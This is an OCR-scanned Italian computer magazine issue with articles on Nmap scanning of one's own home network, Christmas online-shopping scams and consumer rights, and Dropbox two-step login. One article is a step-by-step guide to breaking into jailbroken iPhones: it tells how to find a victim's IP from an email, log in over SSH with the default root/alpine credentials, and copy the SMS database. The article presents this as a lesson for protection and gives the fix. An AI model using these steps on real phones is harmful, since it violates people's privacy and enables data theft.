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^ Osserviamo l'output 

j i L’interrogazione ha rilevato 4 macchine attive all'in- 
Smm# terno dell'intervallo di indirizzi specificato e, nella fatti¬ 
specie, i computer facenti capo agli indirizzi IP 192.168.1.69 , 
192.168.1.100, 192.168.1.104 e 192.168.1.171, tutti eviden¬ 
ziati in giallo nella sezione Host. 


-M II punto di accesso al Web 


2 ! Nella stessa sezione è presente anche una quinta mac- 
* china identificata da Nmap con degli asterischi prima 
deH’indirizzo IP 192.168.1.1: non si tratta di un computer, ma 
del Gateway verso l'esterno, cioè, tipicamente, del router utiliz¬ 
zato per connettersi alla rete Internet. 
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Analizziamo le informazioni 

3 | Selezioniamo la macchina 192.168.1.171 e analizziamo 
le informazioni visualizzate. Le più importanti sono quelle 
relative alle porte open, le quali riconducono a uno o più servizi 
attivi sul computer ''vittima” e che possono rappresentare una 
breccia nel sistema se mal configurati. 


^ Ecco le porte di accesso 

4 1 Vengono rilevate “aperte" le porte 139 e 445, che fan- 
no capo al servizio di condivisione file di Windows, e 80 
e 443. relative a un server Web operante in modalità standard 
(porta 80) e sicura (porta 443). Se usiamo questi servizi non 
allarmiamoci, purché siano ben configurati. 
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Servizi da disattivare 


Individuati i servizi attivi si procederà a verificarne la cor 
retta configurazione (password, permessi ecc.) oppure 
se non necessari, a disabilitarli. Per farlo, da Windows 7 digitia 
mo servizi nella barra di ricerca del menu Start , selezioniamo 
Servizi tra i risultati e diamo Invio. 


^ y Saniamo le vulnerabilità 

0 | Nella schermata che appare individuiamo la voce Servi- 
mmJ zio Pubblicazione sul Web relativa al servizio di gestio¬ 
ne del server Web e selezioniamola col tasto destro del mou¬ 
se. Clicchiamo Proprietà e poi Disabilitato in Tipo di avvio per 
disattivare il servizio e risolvere la vulnerabilità. 



L'interfaccia denomi 
nata"localhost"o"di 
loopback"è una partico¬ 
lare interfaccia fittizia 
locate alla quale viene 
assegnato l'indirizzo IP 
127.0.0.1: mediante es¬ 
sa è possibile effettuare 
numerosi test volti a 
verificare il buon fun¬ 
zionamento dei servizi 
di rete operanti con la 
famiglia di protocolli 
TCP/IP, usati per il col- 
legamento a Internet. 
Gli applicativi di rete 
possono impiegare tale 
interfaccia per stabilire 
delle connessioni tra 
loro, anche quando 
sulla macchina non è di 
sponibile un'interfaccia 
di rete attiva. 

QUALI SONO 
GLI INDIRIZZI? 

Per individuare l'in¬ 
tervallo di indirizzi 
nel quale si trovano le 
macchine della nostra 
rete basta aprire il 
Prompt dei comandi 
(tipicamente in Start/ 
Programmi/Acctifori) 
ed eseguire il comando 
ipconhg : tra le infor 
mazioni visualizzate 
occorrerà individuare 
quella relativa ailln- 
dirizzo IP della Schedo 
Sthernet (se si utilizza 
una connessione trami¬ 
te cavo) oppure della 
Scheda LAN Wireless 
(per le connessioni 
senza fili). Nella casella 
Target di Nmap inseri¬ 
remo questo indirizzo 
sostituendo l'ultimo 
numero con uno zero e 
aggiungendo /24 (se la 
subnet mask indicata 
di seguito all'indirizzo 
IP 0255.255.255.0). 

Ad esempio, se l'indi¬ 
rizzo IP è 192.168.0.12 
e la subnet mask 
255.255.255.0, scrive 
remo 192.168.0.0/24. 
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I Truffe on-line: stanne alla larga I 


Thrffe on-line: 
stanne alla larga 

Le dritte degli esperti per acquisti sul Web a prova di “pacco”. 
Perché a Natale non è vero che siamo tutti più buoni! 




% 

E il jingle di ogni anno, a Natale sia¬ 
mo tutti più buoni: ascoltiamo mu¬ 
siche allegre e facciamo di più per 
gli altri, pensiamo ai regali e cerchiamo 
di organizzare una viaggetto invernale in 
buona compagnia. Sì, tutto vero. Peccato 
che truffatori e malviventi non vadano in 
vacanza! È proprio durante questo periodo 
dell’anno che manipoli di manigoldi si 
dan no appuntamento sul Web e approfitta¬ 
no del nostro ingenuo entusiasmo natalizio 
per propinarci delle sonore fregature. In 
concomitanza del Natale aumenta anche 
l'uso distorto delle tecniche di SEO, con 
cui di solito i webmaster gestiscono l’indi¬ 
cizzazione dei siti nei motori di ricerca: se 
applicate al male, queste tecniche vengono 
chiamate blackhat SEO e possono dirottare 
noi poveri utenti, alla ricerca di un regalo 
o di un viaggio, verso siti illegittimi conte¬ 
nenti minacce pericolose. Come fare allora, 
in un'epoca come la nostra in cui abbiamo 
la grande fortuna di poter fare acquisti 
senza uscire di casa, risparmiando tempo 
e denaro, ad evitare di cadere in queste 
trappole? Come sempre, la conoscenza è 


■ I siti dei tour operator sono sempre molto curati 
graficamente e ricchi di offerte allettanti. Ma 
rimanere affascinati non sempre basta ad assicurarsi 
una vacanza da sogno. 

una grande alleata e quindi con un po' di 
informazione e una sana prevenzione pos¬ 
siamo riportare il rischia a livelli normali; 
e se prendiamo la fregatura, impariamo 
anche a chi rivolgerci. È vero infatti che, 
a causa di una disinformazione ingiusti¬ 
ficata, spesso non facciamo nulla quando 


ci rifilano una sola, mentre invece ci sono 
uffici ed enti specifici pronti a tutelarci 
anche in questi casi. 

Viaggi sicuri 

Il periodo tra Natale e Capodanno è ideale 
per una vacanza imbiancata o per cercare 
mete assolate, e le agenzie di viaggio ci pro¬ 
pongono tanti pacchetti interessanti. Come 
evitare la fregatura, tra le tante offerte? 
Usando il buonsenso innanzitutto! Anche 
sul Web ormai si è creata una distinzione 
abbastanza precisa tra le aziende serie e 
quelle che invece fanno solo promesse. 
Innanzi tutto distinguiamo il concetto di 
velocità da quello di superficialità: è ve¬ 
ro che il Web ci fa risparmiare tempo, ma 
cerchiamo di non avere fretta’. Leggiamo 
attentamente tutte le offerte che abbiamo 
ricevuto via posta elettronica (e sono tante, 
visto il periodo) e poi utilizziamo un motore 
di ricerca per fare approfondimenti. Spesso 
le offerte sono così allettanti e i prezzi così 


VIAGGIA SICURO CON I CONSIGLI DELLA RETE 

Ecco una selezione dei migliori portali Web dedicati ai viaggi, su cui è possibile trovare 
commenti e giudizi di tanti utenti che le vacanze le hanno già fatte. 


©Stripadvisonit 

www.tripadvisor.it 

Balv; viaggio <rom 

www.salvaviaggio.conn 

cuti 

http://viaggi.ciao.it 


t AUTOTUTELA 

www.a-autotutela.it 


È uno dei principali siti Web dedicati ai viaggi: nelle sue pagine gli utenti scambiano 
recensioni e pareri personali, che quindi vengono ritenuti “imparziali", riguardo a 
hotel, ristoranti e attrazioni turistiche. Sicuramente un ottimo punto di partenza per 
organizzare il nostro prossimo viaggio. 

Un portale di tutela e informazione del settore turistico che, oltre a fornire un utile 
supporto per tutte quelle pratiche necessarie ad una partenza serena, nella sezione 
News offre anche i commenti degli stessi viaggiatori. 

Il sito, dedicato agli acquisti on-line, offre una sezione Viaggi ricca di informazioni, 
su cui è possibile anche trovare tanti utili commenti di chi il nostro agognato viaggio 

lo ha già fatto. 

Il portale dell'Associazione Italiana 
dei viaggiatori, con tante 
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convenienti che ci sembra difficile pensare 
che il sogno di andare in Kenya o sulle vette 
innevate siauna bufala. Bene lo sanno, per 
esempio, i turisti che quest’estate si sono 
rivolti al tour operator Alba Tour per la loro 
vacanza caraibica e che all’arrivo sono stati 
dirottati in un altro aeroporto, dove han¬ 
no appreso che le loro stanze erano state 
assegnate ad altri e che quindi avrebbero 
potuto essere ammessi nel villaggio scelto 
non prima del giorno dopo! Dirottati a loro 
spese in un albergo a un'ora di distanza, 
dopo una notte e una giornata da incubo 
sono riusciti ad entrare nel villaggio, per 
scoprire che lo stesso aveva gravi problemi 
con l’acqua e che quindi fare una doccia 
sarebbe stato un miraggio! Le scuse del tour 
operator? Nessuna, a parte una laconica 
mail di 5 righe i n cui Alba Tour (www.alba- 
tour.net), non scusandosi, comunicava in 
spagnolo che avrebbe "concesso" ai turisti 
un massaggio di 30 minuti e una cena. 

Il potere della community 

Nonostante la Bete venga usata sempre più 
spesso come specchietto per le allodole da 
truffatori senza scrupoli, c’è comunque da 
dire che Internet è ormai diventata una 
famiglia globale: lo sappiamo bene noi 
che passiamo il nostro tempo divisi tra 
forum, blog e social network, con Face- 
bookche la fa da padrone. E allora perché 
dimenticare la "famiglia” proprio quando 
un consiglio è così importante? Prima di 
scegliere un tour operator piuttosto che 
un altro, utilizziamo questo benedetto 
motore di ricerca per scovare i consigli 
e i pareri di chi il tour operator lo ha già 
utilizzato! Ce ne sono tanti di questi siti, 
basta cercare "vacanza con nome agenzia 
commenti” e simili per finire su quei siti 
dove sono gli stessi utenti di un servizio a 
commentarlo, e dove possiamo fare tesoro 
delle esperienze altrui. 

Pacchetti e non pacchi 

Anche per acquistare i regali possiamo 
rivolgerci a I nternet, con vantaggi enormi 
sia in termini di tempo che di originalità. 
Con il Web possiamo far arrivare un og¬ 
getto da un posto lontano, direttamente 
a casa del destinatario, possiamo scovare 
regali unici e anche risparmiare parecchi 
euro. Allo stesso modo, però, possiamo 
ricevere delle sonore fregature. È oppor¬ 
tuno, quindi, selezionare attentamente i 
siti su cui effettuare i nostri acquisti, ri¬ 
volgendoci innanzitutto a quelli che co¬ 
nosciamo meglio, o che sono attivi da più 
tempo. Ne abbiamo tanti e coprono tutte 
le tipologie merceologiche. Ma quali sono 



■ Siamo rimasti vittime di una truffa on-line: 
rivolgiamoci immediatamente alla Polizia Postale 
(http://poliziadistato.it), che ci fornirà la competenza 
giusta per far valere i nostri diritti. 


le caratteristiche che deve avere un sito 
per farci sentire tranquilli? Innanzitutto 
le informazioni sulla transazione devono 
essere chiare e facilmente reperibili. Le 
troviamo, disolito, nelle sezioni Condizio¬ 
ni d’acquisto, Informazioni sulla vendita 
o Come acquistare: ogni 
sito chiama la 


creare un account PayPal), oppure, se è la 
prima volta che ci serviamo di un sito, ma¬ 
gari optiamo per un bel bonifico bancario. 

Truffe e disinformazione 

E ora arriviamo alla dolente nota: abbiamo 
avuto una fregatura, che fare? Innanzitutto 
distinguiamo tra i diversi tipi di problemi 
che si possono presentare. Se un oggetto 
arriva rotto, prima di chiamare l’Interpol 
e la guardia nazionale, respiriamo, calmia¬ 
moci e contattiamo il sito. Nelle informa¬ 
zioni dei principali portali di e-commerce 
troviamo sempre scritto cosa fare in questi 
casi. Ci sono siti che non vogl iono nemmeno 
sapere cosa è andato storto nella compra- 
vendita e che ci rimborsano senza battere 
ciglio, semplicemente rimandando il pacco 
indietro: è il caso di www.bonprix.it per 


pagina in mo¬ 
do diverso, ma 
sempre, prima 
di procedere 
ali’àcquisto, an¬ 
diamo a cerca¬ 
re queste infor¬ 
mazioni. Dob¬ 
biamo trovare 
le condizioni di 
vendita, il prezzo 
della spedizione, 
le condizioni di 
recesso e, soprat¬ 
tutto, dobbiamo 
ricordare che un 
sito serio fornisce 
anche l’indirizzo 
fisico del l’azienda 
e il numero di tele¬ 
fono per i contatti, 
oltre che l’indirizzo 
e-mail. Non abbiamo 
paura di pretendere 
queste informazioni, 
loro non pretendono 
forse i dati della no¬ 
stra carta di credito? 
Anche le modalità di 
pagamento sono im¬ 
portanti. Preferiamo 
pagamenti sicuri, tipo 
quelli effettuabili me¬ 
diante PayPal (www. 
paypal.it, a pagina58 di 
questo stesso numero 
di Win Magazine trovi 
la guida passo passo per 
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DISAVVENTURE CON PILLOLE MAGICHE VENDUTE ON-LINE 


Capita, quando prendiamo 
una fregatura on-line, che 
ci sentiamo stupidi e che 
quindi non denuncia¬ 
mo l'accaduto. Nulla 
di più sbagliato, per¬ 
ché i truffatori puntano 
proprio su questo nostro 
pudore per farla franca.Tem¬ 
po fa ho acquistato per vanità e, 
lo ammetto, ingenuità delle pillole 

te. Il tutto è partito da un'e-mail che 
ho ricevuto tra le centinaia che rice- 
/o ogni giorno e che cestino sempre 
perché, che diavolo, lavoro in questo 
campo da anni ormai, e lo so 
che certe cose sono fregature, 
ma... quell'e-mail mi ha folgo¬ 
rata! Furba come una gallinella, 
però, mi sono detta che 
non dovevo fare 
l'allocca e così 
sono andata 
sul sito do¬ 
ve veniva¬ 
no proposte 
queste pillole 
in prova gratuita e 
ho letto tutto. 0 
almeno credevo. 


Comunque, con l'investimento delle sole 
spese di spedizione, poco meno di dieci 
euro, potevo avere un campione gratuito 
di prova di questo miracolo della scienza 
naturale. Come non provare? Insomma, le 
ho prese! Arriva il pacchetto acquistato con 
la PostePay, inizio la cura. Dopo due giorni 
i miei amici mi dicono che sembro matta, 
con improvvisi sbalzi di umore; non ci faccio 
caso, sono un po' instabile. Poi iniziano le 
difficoltà respiratorie, ma anche qui non 
capisco, perché io soffro di asma. Gli amici 
incalzano e quindi, seppur indignata per la 
loro intromissione nelle mie scelte, torno 
sul sito e cerco eventuali controindicazioni. 
Sorpresa delle sorprese, scopro che non c'è 
alcuna indicazione in tal senso, ma che in 
compenso, scritto piccolo piccolo, c'è la 
comunicazione che mi sarebbero state 
addebitate dopo 15 giorni settanta euro 
sulla carta di credito, a meno di una mia 
disdetta. Meno male che non ero allocca! 

Alia ricerca dei truffatori 

Il bello arriva quando mi metto alla ricerca 
di un indirizzo per disdire e non trovo nulla! 
Vado allora a cercare il contratto, e lo trovo 
dopo affannose ricerche, ma in una lingua 
assolutamente incomprensìbUe. Panico! Mi 
ricordo quindi dei forum e cerco notizie, sco¬ 
prendo che anche altri hanno subito la mia 


sorte. Nel frattempo finisco in ospedale, per 
crisi respiratoria, dove rimango a farmi rivol¬ 
tare come un calzino per quìndici giorni. 

10 li denuncio! 

E basta ora però. Appena posso, affronto la 
vergogna e mi reco all'ufficio del la polizia po¬ 
stale della mia città. Entro e mi offrono aiuto, 
gentili e sorridenti. Cercando di darmi un con¬ 
tegno, spiego che voglio fare una denuncia 
per un acquisto fatto sulla rete che mi ha pro¬ 
vocato danni alla salute, probabilmente alla 
borsa e certamente all'orgoglio. Il funzionario 
mi fa accomodare, quindi gli racconto la mia 
storia, aspetta ndounsuo sorriso i ronico per 
morire lì sulla sedia. Invece vengo ascoltata, 

11 funzionario mi aiuta a fare la denuncia, mi 
dice che su quel prodotto e quell'azienda si 
sta già indagando, e mi consola anche perché, 
mi dice, non sono l'unica ragazza ad essere 
rimasta abbagliata dall'offerta e che è facile 
subire questo genere di truffe per chi non è 
esperto e attento. Ride solo quando gli dico 
cosa faccio per vivere, ma me la sono meritata. 
La prima cosa che mi hanno fatto fare è stata 
bloccare la PostePay e farne una nuova, poi 
una raccomandata con ricevuta di ritorno ad 
un indirizzo in Inghilterra che abbiamo trovato 
insieme sul sito incriminato e quindi firmare la 
denuncia. La truffa oltretutto è stata scoperta 
e una decina di persone arrestate. 


esempio, specializzato nella vendita di 
vestiti e accessori. Su wwvv.privalia.com 
possiamo chiedere la sostituzione o il rim¬ 
borso, sia per oggetti rotti che per errori 
di taglie o colore. Queste non sono però 
fregature, ma solo intoppi, i 
rischi del comprare on-line. 

Se l'oggetto invece non arriva, 
allora il discorso cambia. Se 
abbiamo acquistato su un sito 
organizzato e serio, la spedizio¬ 
ne è tracciabile. Contattiamo il 
gestore del negozio on-1 ine che 
ci fornirà tutte le informazioni 
per aiutarci nella ricerca; se 
il pacco è partito, magari è in 
ritardo. Se poi siamo finiti nel 
caso peggiore, e cioè qualcuno 
ci ha voluto proprio rifilare un 
pacco, allora andiamo subito 
alla polizia. Sono gentili, sono 
organizzati e sono efficientissi¬ 
mi. Nello specifico, abbiamo a 
disposizione la Polizia postale 
che si occupa proprio delle fro¬ 
di informatiche. 


Truffe, andiamo alla fonte 

Come si dice, però, prevenire è meglio che 
curare! Per non cadere nella trappola delle 
frodi informatiche è bene analizzare come 
un simile fenomeno possa diffondersi. Il 

GLI INDIRIZZI UTILI 
IN CASO DI NECESSITÀ 


metodo preferito dai truffatori per com¬ 
piere le loro malefatte è quello di inondare 
le nostre caselle di posta elettronica (ma 
anche quelle reali), di offerte miracolose e 
irresistibili. Le menti criminali sono quelle 
che in assoluto hanno capito, 
nel mercato del lavoro, quan¬ 
to sia importante la sezione 
ricerca e sviluppo, e infatti in¬ 
ventano sempre modi nuovi 
per raggirarci. Ricevere un’e- 
mail con un'offerta strepitosa 
è bellissimo, ma già lo stesso 
messaggio può contenere pe¬ 
ricoli. Innanzitutto mai e poi 
mai aprire allegati, potrebbe¬ 
ro contenere virus, malware, 
spyware echi pili nella più ne 
metta. Ma anche cliccare sui 
link non è salutare, per le stes¬ 
se motivazioni: prima di farlo, 
è opportuno leggere nella bar¬ 
ra di stato del client di posta il 
sito su cui realmente verremo 
reindirizzati. 11 phishing(cioè 
il furto di dati personali) non 


www.agcm.it 

L'Autorità Garante per la concorrenza ed il mercato è 
anche competente nei casi di pubblicità ingannevole 
diffusa via Internet 

www.garanteprivacy.it 

Rivolgiamoci all'Autorità Garante perla riservatezza 
ed il trattamento dei dati personali per segnalare 
ogni trattamento illecito dei nostri dati personali 

www.poliziadistato.it 

Possiamo rivolgerci alla Polizia di Stato o alla 
Polizia Postale anche attraverso i canali telematici 
resi disponibili sulle pagine del sito per segnalare o 
denunciare abusi e reati subiti in Rete 
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La parola all'avvocato 


ACQUISTI ON-LINE A PROVA DI PACCO 

Il Web è pieno di siti su cui effettuare acquisti in tutta sicurezza: basta solo seguire alcune regole 
di comportamento e il buonsenso. Ecco una selezione di quelli preferiti dalla redazione.. 

Un portale interamente dedicato a tutti gli amanti dello sport, su cui è possibile trovare 
www.oiiviero.it accessori, abbigliamento e tutto l'occorrente per le proprie attività ginniche. 

Dedicato a chi deve acquistare prodotti tecnologici, il sito è organizzato 
www.ttimeshop.it e permette di trovare facilmente le migliori offerte presenti sul mercato. 


www.mediashopping.it 


Negozio on-line su cui è possibile trovare davvero di tutto, dall'elettronica, 
all'abbigliamento, passando anche per articoli sportivi, libri e accessori 
per la casa. 


www.amazon.it 


Uno dei più grandi portali al mondo per lo shopping on-line. Le offerte 
riguardano sia i prodotti di elettronica sia quelli dedicati al tempo liberi 
allo sport, alla bellezza e alla casa. Oltre i 50 euro di spesa, le spese di 
spedizione sono gratuite. 


perdona: meglio perdere un’offerta che 
prendere una fregatura! Non serve, però, 
fare inutili allarmismi. Sul Web c’è la ripro¬ 
duzione esatta del mondo in cui viviamo, 
con lesué contraddizioni e i suoi lati oscuri. 
Demonizzarlo, o averne paura, ci pone in 
una situazione di inferiorità rispetto agli 
altri e ci fa rimanere fermi. Uscire a fare 


una passeggiata, andare al mare con gli 
amici, o a teatro la sera è bello esattamente 
come chattare, utilizzare l’e-cominerce e 
scrivere su un blog. Basta solo fare un po' di 
attenzione, non accettare caramelle dagli 
sconosciuti e andare da chi ne sa più di noi 
quando ci accorgiamo che qualcosa non è 
coirle dovrebbe essere! 


amazonit 


www.privalia.it 


Il sito è dedicato a quanti cercano veri e propri affari in tutta sicurezza: è infatti 
organizzato come una vetrina virtuale per le grandi marche che, per periodi 
limitati, propongono oggetti a prezzi scontatissimi. 


■ Scorza 
e uno dei massimi esperti 
VhJ in Diritto delle Nuove 
Tecnologie 


E-COMMERCE SI. 
MA CON GIUDIZIO! 


L'Italia è il fanalino di coda in Europa in termini di 
diffusione del commercio elettronico: il numero 
di connazionali che acquistano on-line è stra¬ 
ordinariamente più basso rispetto a quello dei 
cittadini degli altri Paesi dell'Unione, cosi come 
enormemente più bassa è la cifra complessiva 
spesa in Italia sui siti di e-commerce. 

Tra le tante ragioni di questo triste primato vi è, 
certamente, la scarsa fiducia che nutriamo negli 
acquisti a distanza on-line e mediante carta di 
credito. La paura di truffe o, più semplicemente, di 
prendere fregature rappresenta, evidentemente, 
un blocco psicologico che frena una radicale tra¬ 
sformazione delle nostre abitudini di consumo. Ma 
è una paura giustificata? La legge, a ben vedere, 
tutela il consumatore negli acquisti on-line in ma¬ 
niera, forse, persino più efficace di quanto non lo 
tuteli nel mercato tradizionale. E poi basta seguire 
delle semplici regole comportamentali. 


• Innanzitutto guai a fare acquisti su siti di e-com¬ 
merce che non ci consentano di individuare in 
modo puntuale i dati anagrafici del gestore del 
venditore. Non c'è diritto esercitabile contro i 
tanti"Mr. Nobody"(senza volto) che popolano 
la Retee non si può trascinare in Tribunale un 
sito Internet. 

• La seconda preziosa indicazione viene dal 
Codice del consumo che assimila gli acquisti 
on-line agli acquisti effettuati nell'ambito di 
contratti a distanza, riconoscendo pertanto 
ai consumatori, a prescindere da ogni con¬ 
siderazione circa la qualità o difettosità del 
prodotto acquistato, il diritto di recedere dal 
contratto entro dieci giorni dal momento in cui 
si è effettivamente acquisita la disponibilità del 
bene. Se il venditore dovesse opporsi e rifiutarsi 
di riprendersi il gadget tecnologico che ci ha 
venduto o, piuttosto, di restituirci i nostri soldi, 
un bel post sul suo forum, una segnalazione ad 
un'associazione di consumatori o una lettera 
ben scritta nella quale gli si ricorda quanto pre¬ 
visto in materia di diritto di recesso dal Codice 
del Consumo, dovrebbero essere sufficienti 
a fargli cambiare idea e fargli comprendere 
che, specie nell'era del web 2.0 un'azienda 
di e-commerce, vive di "reputation on-line"e 
se iniziano a circolare voci che la ritraggono 
inaffidabile potrebbe pentirsi amaramente di 
non aver rispettato i nostri diritti. 


• Nei casi più gravi, c'è sempre il Giudice di Pace 
(quello della nostra città di residenza) al quale 
possiamo rivolgerci per ottenere quanto ci 
compete. Le stesse regole, più o meno, valgono 
nell'ipotesi nella quale il prodotto acquistato 
non abbia le caratteristiche pubblicizzate e/o 
descritte sul sito di e-commerce. Anche in que- 1 
sto caso il Codice del Consumo ci riconosce J 
diversi diritti tra i quali quello di ottenere la 
riparazione del bene, se possibile o, piuttosto, 
la risoluzione del contratto e la conseguente 
restituzione del prezzo. Questa volta il termine 
entro il quale far valere i nostri diritti è ben più | 
lungo: 26 mesi dall'acquisto. 

Ma se nel corso di un'esperienza di consumo on-li¬ 
ne dovessimo imbatterci in un autentico truffatore 
virtuale? Qualcuno che incassa i nostri soldi e poi 
si dissolve in una nuvola di bit invece che inviarci 
il prodotto che abbiamo acquistato? In questo 
caso sarebbe necessario mostrare i muscoli e la I 
strada perfarloè rappresentata da una denuncia 
(non servono avvocati) da presentare alla Polizia i 
postale e delle telecomunicazioni o alla Guardia : 
di finanza. Sapranno poi loro cosa fare per provare 
a rintracciare il novello Lupin della Rete. On-lihe, j 
tutto sommato, non significa far west ed esistono, j 
ormai, diversi rimedi per godersi i vantaggi dell'e- 
commerce con giudizio. Come sempre sta a noi j 
tenere gli occhi aperti e saperci difendere. 
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Smartphone 
sotto attacco! 

Ecco come fanno i pirati informatici a rubare i dati 
personali e i messaggi SMS inviati da un iPhone 


L I iPhone è uno dei cellulari più 
* venduti e usati al mondo gra- 
I zie alla sua semplicità d’uso, 
alle tante funzionalità e all'eleva¬ 
ta sicurezza, conseguenza anche 
delle rigide limitazioni imposte 
da Apple per la pubblicazione di 
applicazioni sull’AppStore. Tutto 
ciò, però, ha agevolato la nasci¬ 
ta dello store alternativo Cydia, 
dove è possibile trovare app che 


aggiungono funzionalità "unof- 
ficial” all’iPhone. Per installarle, 
però, lo smartphone deve essere 
preventivamente sbloccato effet¬ 
tuando un'operazione cosiddetta 
di jailbreak (la procedura, al li¬ 
mite della legalità, è facilmente 
reperibile su Internet). Tra le app 
non autorizzate ce n’è una che si 
chiama OpenSSH e permette di 
trasferire in rete file di grandi di¬ 


mensioni senza necessariamente 
passare per iTunes. 

Occhio alla password 

Affinché l'app funzioni corretta- 
mente sull'iPhone deve essere at¬ 
tivo, ovviamente, il servizio che 
gestisce il protocollo SS11. E fin qui 
nessun problema, se non fosse che 
questa "porta” di comunicazione 
lasciata aperta e incustodita potreb- 


Cosa ci /O 
occorre 

SMARTPHONE 

IPHONE 4S 

Quanto costa: € 629,oo 
Sito Internet: 

www.applacom 

SCANNER DI RETE 

NMAP 

Quanto costa: 

Lo trovi su: 0CD 

«na 

Sito Internet: 

http://nmap.org 

CLIENT FTP 

CYBERDUCK 

Lo trovi su: S?C0 

«HI» 

Sito Internet: 

http://cyberduck.ch 


13 L’iPhone è in trappola 

Usando uno scanner di rete, ad un pirata informatico bastano pochi secondi per analizzare qualunque rete WLAN 
alla ricerca di possibili smartphone vulnerabili ai suoi attacchi. Studiamo le sue mosse. 





Gli attrezzi del mestiere 

i Come prima operazione, il pirata instal- 
8 la sul proprio computer portatile dotato di 
connettività Wi-Fi il programma NMAP, disponi¬ 
bile in versione compatibile con tutti i principali 
sistemi operativi. Pochi clic ed eccolo pronto a 
compiere le sue malefatte. Il pirata attiva la con¬ 
nessione Wi-Fi, avvia il programma ed esegue 
una scansione con Scan. 


± La mela si riconosce subito 

2 1 Gli basta aspettare qualche istante per 
W trovare tutte le periferiche connesse nel¬ 
le vicinanze. Si annota gli indirizzi IP individuati 
e li inserisce nel campo Target per individuare 
l’iPhone della vittima. L’attacco funziona anche 
se lo smartphone è connesso su rete 3G. In que¬ 
sto caso, il pirata cercherà di ricevere un’e-mail 
dalla vittima. 


▲ La vittima è in trappolai 

3 I Ricevuto il messaggio, il pirata ne copia il 
sorgente e lo incolla nell’apposito campo 
di testo nella pagina Web www.ip-adress.com/ 
trace_email per scoprire TIP della vittima. A que¬ 
sto punto, il pirata verifica se il servizio SSH è 
attivo sull’iPhone: in NMAP digita TIP in Target. 
Se la porta 22 è aperta, allora può portare a ter¬ 
mine l’attacco. 
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I Smartphone sotto attacco I 


Ti spio da PCC* 



Gli SMS sono in pericolo 


Il pirata è riuscito a collegarsi in maniera anonima e invisibile all’iPhone della vittima. A questo punto ha libero 
accesso alla memoria dello smartphone e a tutti i dati personali in essa archiviati! 



a i Accessi non autorizzati 

Individuato l’indirizzo IP della vittima e veri¬ 
ficata la vulnerabilità del suo iPhone, il pira¬ 
ta usa il programma CyberDuck per accedere in 
SSH al dispositivo. Avviato il software, si connette 
allo smartphone cliccando Nuova connessione e 
usando i dati di accesso predefiniti: root e alpine. A 
questo punto ha libero accesso al telefono! 



▲ Cartelle senza protezione 

2 ] Una volta completata la connessione con lo 
smartphone della vittima designata, il pirata 
individua la cartella /private/var/mobile/Library. 
al suo interno vengono archiviati i dati personali 
dell'utente ed in particolare gli SMS, le foto, i video 
e icbntatti, reperibili rispettivamente nelle sotto¬ 
cartelle SMS ; Media , Cali History, Address Book. 
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-m È tutto in un database 

Se è interessato ai messaggi di testo che la 
vittima ha scambiato con I suoi contatti, il 
pirata copia il file sms.db. il suo formato indica che 
si tratta di un database a cui il pirata può accedere 
mediante il programma gratuito SQLite. Importato 
il file DB, potrà vedere in chiaro tutti gli SMS della 
vittima. Un gioco da ragazzi per lui! 






BASTA POCO PER PROTEGGERE 
" °PQPRIO IPHONE 


he essere sfruttata da un eventuale 
malintenzionato per accedere alla 
memoria interna dell’iPitone e otte¬ 
nere così libero accesso ai database 
contenenti SMS, contatti e immagi¬ 
ni! Per farlo, gli basta semplicemen¬ 
te collegarsi i n rete allo smartphone 


autenticandosi con la password di 
protezione per l'esecuzione delle 
applicazioni che pochi utenti del 
melafonino si ricordano di modifi¬ 
care. A questo punto, portare a 
termine un attacco del genere 
diventa davvero un gioco da 


Come già detto, la tecnica di at¬ 
tacco analizzato nei passi del tu- 
torial funziona soltanto se sullo 
smartphone di casa Apple è attivo 
il servizio di rete SSH per le comu¬ 
nicazioni on-line (basta installare 
l'app OpenSSH per abilitarlo au¬ 
tomaticamente) e, soprattutto, se 
l'utente non ha mai modificato la 
password utilizzata come protezio¬ 
ne per l'esecuzione delle applica 
zioni installate nell'iPhone stesso. 
Per proteggere i nostri dati perso¬ 
nali, quindi, è opportuno cambia¬ 
re il prima possibile le credenziali 
d'accesso alla memoria interna del 
proprio smartphone. Per compiere 


questa operazione, occorre av 
viare il terminale (magari instai 
landò e usando un'app come 
iSSH o Prompt). Dal prompt dei 
comandi digitiamo 
scriviamo la nuova password 
Eseguiamo quindi anche 
comando passwd mobile 
e scegliamo un'altra pas 
sword. Fatto questo, chiu¬ 
diamo il terminale. Que¬ 
sta operazione ci mette 
al riparo da eventuali 
attacchi il cui scopo 
è quello di accedere 
alla memoria interna 
dell'iPhone! 


ragazzi. Ed ecco quindi l'opportu¬ 
nità di capire come funziona questa 
tecnica di hacking per imparare a 
proteggerei! proprio smartpho¬ 
ne da intrusioni non 


autorizzate. 



DALL'E-MAILALL'IP 


Nel Passo A3 abbiamo 
visto quanto è fatile per 
un pirata risalire all'IP di 
chiunque semplicemen¬ 
te inviandogli une-mail: 
ogni messaggio, infatti, 
si porta dietro anche 
tutte le informazioni • 
utili sul mittente e tra 
queste, in particolare, il 
provider utilizzato e lln- 
dirizzo IP. Ma in questo 
modo, quindi, chiunque 
potrebbe scoprire anche 
l'indirizzo IP di un pira¬ 
ta! In linea di principio 
si, ma chiaramente un 
eventuale malintenzio¬ 
nato non userebbe mai 
la propria e-mail per 
contattare la vittima, 
ricorrendo invece ad uno 
dei tanti servizi on-line 
come Anonymailer.net 
che permettono di in¬ 
viare le cosiddette fake 
e-mail, cioè messaggi 
temporanei e completa 
mente anonimi! 
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I Account dropbox sotto chiave I 


C Ti spio da PC 


Hai paura che qualcuno possa accedere ai file salvati 

nei cloud? Ecco le nostre dritte per metterli al sicuro 


Account Dropbox 
sottochiave 


Chi ha la necessità di cond ividere on- 
line file personali, foto o documenti 
di lavoro, sicuramente già conosce 
Dropbox. Creando infatti un account 
gratuito, possiamo utilizzare ben 5 
GB di spazio per caricare tutti i file 
che vogliamo. Possiamo poi con¬ 
dividerli pubblicamente o solo con 
determinate persone. Non molto 



Dopo aver inserito la nostra userna- 
me e password di accesso è infatti 
necessario digitare anche un codice 
numerico che viene inviato in pochi 
istanti sul nostro telefonino, ovvia¬ 
mente senza spendere un solo cen¬ 
tesimo! Tuttavia, tale funzionalità 
deve essere abilitata manualmente. 
Scopriamo quindi come fare! 



tempo fa, però, alcuni pirati sono 
riusciti a violare i sistemi di sicurezza 
di Dropbox impossessandosi dei dati 
personali di centinaia di migliaia di 
ignare vittime. Ma qualcosa oggi è 
cambiato: per garantire il massimo 
grado di sicurezza gli sviluppatori 
di Dropbox hanno pensato di in¬ 
trodurre un nuovo metodo di login. 


Le impostazioni del servizio 

